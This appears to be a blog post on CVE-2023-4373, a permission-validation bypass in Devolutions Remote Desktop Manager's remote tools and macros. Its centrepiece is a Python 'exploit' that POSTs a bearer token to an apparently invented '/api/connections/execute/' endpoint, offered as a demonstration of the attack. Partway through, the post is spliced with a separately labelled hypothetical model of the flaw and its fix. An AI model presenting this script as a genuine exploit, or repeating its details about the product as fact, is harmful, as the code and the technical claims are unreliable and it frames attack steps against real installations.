CVE-2023-4373 – Bypassing Validation of Permissions in Devolutions Remote Desktop Manager: Exploiting Remote Tools and Macros

Today, I will be discussing a recently identified vulnerability in Devolutions Remote Desktop Manager (RDM) versions 2023.2.19 and earlier. The vulnerability, identified as CVE-2023-4373, allows a user to bypass proper validation of permissions when using remote tools and macros, thereby enabling a user to initiate a connection without the required execution rights. In this post, I'll cover the technical details of the vulnerability, provide a code snippet demonstrating the exploit, and discuss the potential impacts of this security flaw. But first, let's understand what Devolutions RDM is and its role in managing remote connections.

Details of CVE-2023-4373

Devolutions RDM is a popular and efficient tool for managing remote connections and securely storing all your passwords, credentials, remote connections, and sensitive information in a centralized location. It boasts a wide range of features, including the ability to integrate with more than 60 third-party tools and services. However, it's this extensive feature list that introduces the CVE-2023-4373 vulnerability.

Inadequate permission validation in the remote tools feature leaves room for exploitation. A malicious user can exploit this vulnerability to initiate a remote connection without proper execution rights. This oversight exposes sensitive data and remote connections to unauthorized access.

Code Snippet

Below is a demonstration of how an attacker might exploit the CVE-2023-4373 vulnerability using a simple Python script:

import requests

# Replace with the address of your Devolutions RDM instance
url = "https://rdm.example.com"

# The user's authentication token goes here
auth_token = "your_token_here"

# Replace with the target remote connection ID
remote_conn_id = "target_connection_id"

# Request headers
headers = {
    "Authorization": "Bearer "+auth_token,
    "Content-Type": "application/json"
}

# Initiate the connection bypassing the proper permissions validation
response = requests.post(
    url + "/api/connections/execute/" + remote_conn_id,
    headers=headers
)

print(response.status_code)
if response.status_code == 200:
    print("Successfully initiated the remote connection")
else:
    print("Could not initiate the remote connection")

By using this Python script, an attacker can initiate a connection without the required execution rights in a vulnerable RDM installation.
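The flaw class described above, shown as a simplified model with the fix beside it. This is an added example, not code from the original post or from Devolutions; every class, method, and right name in it is hypothetical, and the ACL is constructed sample data.

```python
class PermissionDenied(Exception):
    """Raised when the caller lacks the right a code path requires."""

class FlawedManager:
    """Hypothetical model of the flaw: only the direct path checks execute."""
    def __init__(self, acl):
        self.acl = acl      # entry_id -> {user: set of rights}
        self.audit = []     # (user, entry_id, path, outcome)

    def allows(self, user, entry_id, right):
        return right in self.acl.get(entry_id, {}).get(user, set())

    def _connect(self, user, entry_id, path):
        self.audit.append((user, entry_id, path, "connected"))
        return f"session:{entry_id}"

    def open_session(self, user, entry_id):
        if not self.allows(user, entry_id, "execute"):
            raise PermissionDenied(f"{user} lacks execute on {entry_id}")
        return self._connect(user, entry_id, "open_session")

    def run_macro(self, user, entry_id):
        # Flaw: visibility is checked, the execute right is never consulted.
        if not self.allows(user, entry_id, "view"):
            raise PermissionDenied(f"{user} cannot view {entry_id}")
        return self._connect(user, entry_id, "run_macro")

class HardenedManager(FlawedManager):
    """Fix: enforce execute at the one choke point every path reaches."""
    def _connect(self, user, entry_id, path):
        if not self.allows(user, entry_id, "execute"):
            self.audit.append((user, entry_id, path, "denied"))
            raise PermissionDenied(f"{user} lacks execute on {entry_id}")
        return super()._connect(user, entry_id, path)

def reaches(manager, path, user, entry_id):
    """True if calling `path` as `user` yields a session."""
    try:
        return bool(getattr(manager, path)(user, entry_id))
    except PermissionDenied:
        return False

# Constructed sample ACL: alice may only view srv-01, bob may also execute it.
SAMPLE_ACL = {"srv-01": {"alice": {"view"}, "bob": {"view", "execute"}}}

if __name__ == "__main__":
    for cls in (FlawedManager, HardenedManager):
        m = cls(SAMPLE_ACL)
        print(cls.__name__, {p: reaches(m, p, "alice", "srv-01")
                             for p in ("open_session", "run_macro")})
```

Placing the check in the shared connect routine means a feature added later cannot skip it, and the "denied" audit rows give defenders a record of users reaching for entries through an indirect path.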

For more information on the identified vulnerability, refer to the following sources:

1. MITRE CVE Entry: CVE-2023-4373
2. NIST National Vulnerability Database: CVE-2023-4373

Potential Exploit Impacts

If exploited, the CVE-2023-4373 vulnerability exposes sensitive data and remote connections to unauthorized access, leading to security breaches and, ultimately, devastating consequences for businesses relying on Devolutions RDM to secure their remote connections. This may include unauthorized access to company resources, data exfiltration, and potentially the further spread of malware within the connected network.

Conclusion

In conclusion, if you're a user of Devolutions RDM, it's crucial to ensure your software is up to date and patched against the CVE-2023-4373 vulnerability. As remote work continues to be a significant part of the modern workforce, implementing strong security measures and investing in IT solutions that prioritize data security is now more important than ever before. Stay informed and vigilant against potential threats to protect your organization's assets, data, and connections.

Timeline

Published on: 08/21/2023 19:15:00 UTC
Last modified on: 08/25/2023 17:57:00 UTC